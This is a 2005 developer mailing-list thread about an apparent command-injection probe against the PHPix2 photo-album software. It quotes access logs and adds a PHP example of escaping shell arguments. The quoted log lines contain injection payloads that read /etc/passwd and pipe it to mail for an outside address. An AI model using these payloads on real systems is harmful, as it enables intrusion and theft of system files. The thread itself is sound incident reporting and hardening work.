From: Neale P. <ne...@wo...> - 2005-01-30 21:22:09

I downloaded the latest release of PHPix2 and tried a few things to execute shell code. I was unable to run anything, but I’m not convinced it’s safe. One of the reasons I now generate static HTML for my photo albums is so I don’t have to worry about this sort of thing.

It looks like this person was just trying things out by hand. Do you see any mail to this address in your mail server logs?

Recent versions of PHP have a built-in function to escape strings for shell commands. This should be done in the showpic.php:CreateImage function, just before the call to system.

Neale

LT-P <LT...@LT...> writes:

> Looking into my apache logs, I found this:
> ___
> ip68-11-168-198.br.no.cox.net - - [28/Jan/2005:21:24:06 +0100] "GET /albums/?mode=album&album=Divers&dispsize=800&start=0 HTTP/1.1" 200 5348 "http://www.google.de/search?hl=de&q=intext%3AGenerated.by.PHPix+2.0.3%3F+inurl%3A%24mode%3Dalbum&meta=" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322)"
> ip68-11-168-198.br.no.cox.net - - [28/Jan/2005:21:24:07 +0100] "GET /albums/style.css HTTP/1.1" 200 2137 "http://83.192.28.223/albums/?mode=album&album=Divers&dispsize=800&start=0" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322)"
> ip68-11-168-198.br.no.cox.net - - [28/Jan/2005:21:24:09 +0100] "GET /albums/showpic.php?album=Divers&dispsize=100&user=&pic=DSC00039.JPG&width=75&height=100&mode=album HTTP/1.1" 200 7562 "http://83.192.28.223/albums/?mode=album&album=Divers&dispsize=800&start=0" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322)"
> ip68-11-168-198.br.no.cox.net - - [28/Jan/2005:21:24:10 +0100] "GET /CSS/ltpnet-black.css HTTP/1.1" 200 4999 "http://83.192.28.223/albums/?mode=album&album=Divers&dispsize=800&start=0" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322)"
> ip68-11-168-198.br.no.cox.net - - [28/Jan/2005:21:24:11 +0100] "GET /albums/showpic.php?album=Divers&dispsize=100&user=&pic=DSC00040.JPG&width=75&height=100&mode=album HTTP/1.1" 200 7859 "http://83.192.28.223/albums/?mode=album&album=Divers&dispsize=800&start=0" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322)"
> ip68-11-168-198.br.no.cox.net - - [28/Jan/2005:21:24:12 +0100] "GET /albums/blank.gif HTTP/1.1" 200 43 "http://83.192.28.223/albums/?mode=album&album=Divers&dispsize=800&start=0" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322)"
> ip68-11-168-198.br.no.cox.net - - [28/Jan/2005:21:24:13 +0100] "GET /albums/showpic.php?album=Divers&dispsize=100&user=&pic=DSC00041.JPG&width=100&height=75&mode=album HTTP/1.1" 200 7978 "http://83.192.28.223/albums/?mode=album&album=Divers&dispsize=800&start=0" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322)"
> ip68-11-168-198.br.no.cox.net - - [28/Jan/2005:21:24:20 +0100] "GET /albums/?mode=album&album=Divers&pic=`cat%20/etc/passwd`&dispsize=640&start=0 HTTP/1.1" 200 5480 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322)"
> ip68-11-168-198.br.no.cox.net - - [28/Jan/2005:21:24:49 +0100] "GET /albums/?mode=album&album=Divers&pic=`cat%20/etc/passwd%20|%20mail%20windexi...@gm...`&dispsize=640&start=0 HTTP/1.1" 200 5517 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322)"
> ___
>
> The email (win...@gm...) is a real one, with a person answering.
>
> I checked the executed PHPix code used during this attack and did some tests. It /seems/ to be ok, the PHPix engine is (probably ?) safe on this point.
> But I think it could be a Good Idea to review the entire code and to look for potential abuse possibilities.
>
> Regards,
> LT-P
>
> -- 
> Seals are cute, kiss them
>
> _______________________________________________
> PHPix2-devel mailing list
> PHP...@li...
> https://lists.sourceforge.net/lists/listinfo/phpix2-devel
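The fix Neale describes, as an added example that is not PHPix2's own code and not from anyone in the thread: a hypothetical CreateImage-style command builder in its vulnerable shape beside a version that passes every query value through PHP's escapeshellarg() (the built-in he refers to) before the string reaches system(). The function names, the ImageMagick convert command, the paths and the file-name allowlist are assumptions.

```php
<?php
// Added example, not PHPix2's own code. Function names, the ImageMagick
// "convert" command and the paths are assumptions; the point is where the
// escaping happens: on every untrusted value, right before the command string
// reaches system().

// Vulnerable shape: the pic/album query values are interpolated verbatim, so a
// value like `cat /etc/passwd` is handed to the shell as command substitution.
function buildThumbnailCommandUnsafe(string $album, string $pic, int $w, int $h): string
{
    return "convert albums/$album/$pic -resize {$w}x{$h} cache/$pic";
}

// Hardened shape: escapeshellarg() wraps each value in single quotes and
// escapes embedded quotes, so backticks, pipes and semicolons stay literal.
function buildThumbnailCommandSafe(string $album, string $pic, int $w, int $h): string
{
    // Defence in depth (assumption, not from the thread): only plain file
    // names are accepted, which also rules out "..", "/" and empty values.
    $plain = '/\A(?!\.\.?\z)[A-Za-z0-9_.-]+\z/';
    if (!preg_match($plain, $album) || !preg_match($plain, $pic)) {
        throw new InvalidArgumentException('invalid album or picture name');
    }
    $src      = escapeshellarg("albums/$album/$pic");
    $geometry = escapeshellarg("{$w}x{$h}");
    $dst      = escapeshellarg("cache/{$w}x{$h}-$pic");
    return "convert $src -resize $geometry $dst";
}

// Values taken from LT-P's access log above.
$benign  = 'DSC00039.JPG';
$hostile = '`cat /etc/passwd`';

echo "unsafe: ", buildThumbnailCommandUnsafe('Divers', $hostile, 75, 100), "\n";
echo "quoted: ", escapeshellarg($hostile), "\n";   // what system() would see after escaping
echo "safe:   ", buildThumbnailCommandSafe('Divers', $benign, 75, 100), "\n";
try {
    buildThumbnailCommandSafe('Divers', $hostile, 75, 100);
} catch (InvalidArgumentException $e) {
    echo "rejected: ", $e->getMessage(), "\n";
}
```

Run with the PHP CLI to compare the three command strings; the "quoted" line shows that after escaping the backticks are inert text inside single quotes, and the allowlist rejects the value before it is ever built into a command.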